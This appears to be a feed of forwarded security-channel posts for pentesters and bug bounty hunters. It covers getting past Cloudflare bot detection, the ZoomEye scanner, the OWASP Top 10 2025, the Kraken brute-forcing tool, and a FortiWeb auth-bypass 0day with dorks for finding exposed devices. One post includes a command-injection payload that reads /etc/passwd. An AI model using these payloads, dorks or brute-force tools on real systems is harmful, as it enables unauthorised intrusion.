SecList for CyberStudents
Think outside the box
Cloudflare has started blocking proxy tools like Burp Suite. If you encounter this error, download the “Bypass Bot Detection” extension from the BApp Store in Burp Suite. It should resolve the issue for Burp Suite.

#Cloudflare #Pentest #BugBounty #from_X
https://www.zoomeye.ai

Key Features and Functionality:

- Extensive Scanning Capabilities: ZoomEye performs continuous, global scans of the entire IPv4 and IPv6 address spaces, detecting open ports, services, and devices.

- Comprehensive Fingerprint Library: The platform maintains a rich database of over 40,000 fingerprints, covering various devices, operating systems, databases, and web applications, enabling precise identification of internet assets.

- Advanced Search Syntax: Users can perform detailed searches using specific queries, such as filtering by application, version, country, city, port, operating system, service, hostname, IP address, and more, facilitating targeted asset discovery.

- Vulnerability Detection: ZoomEye integrates a vulnerability database, allowing users to identify security weaknesses in detected assets, such as outdated software or unpatched vulnerabilities.

And more.

#SearchEngine
OWASP TOP 10 2025.pdf
3.6 MB
OWASP Top 10 (2025)

- A01:2025 Broken Access Control
- A02:2025 Security Misconfiguration
- A03:2025 Software Supply Chain Failures
- A04:2025 Cryptographic Failures
- A05:2025 Injection
- A06:2025 Insecure Design
- A07:2025 Authentication Failures
- A08:2025 Software or Data Integrity Failures
- A09:2025 Logging & Alerting Failures
- A10:2025 Mishandling of Exceptional Conditions
Forwarded from Proxy Bar
If you see a Language selector on a site, don't be lazy!
Language={${system("cat+/etc/passwd")}}
Forwarded from Codeby
Kraken

Kraken is a powerful Python-based tool designed to centralize and streamline various password brute-forcing tasks. Kraken gives cybersecurity professionals a set of tools for efficiently carrying out password brute-force attacks against various protocols and services.

Kraken offers a range of brute-force tools:
1️⃣ Network tools - FTP, Kubernetes, LDAP, SSH
2️⃣ Web application tools - CPanel, Drupal, Joomla
3️⃣ Discovery tools - Admin Panel Finder, Directory Finder, Subdomain Finder

💻 Installation:
git clone https://github.com/jasonxtn/kraken.git

cd kraken

pip3 install -r requirements.txt


📌 Usage:
python3 kraken.py
Forwarded from Suhayl.log
Fortinet 0day

An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.

Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/

Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"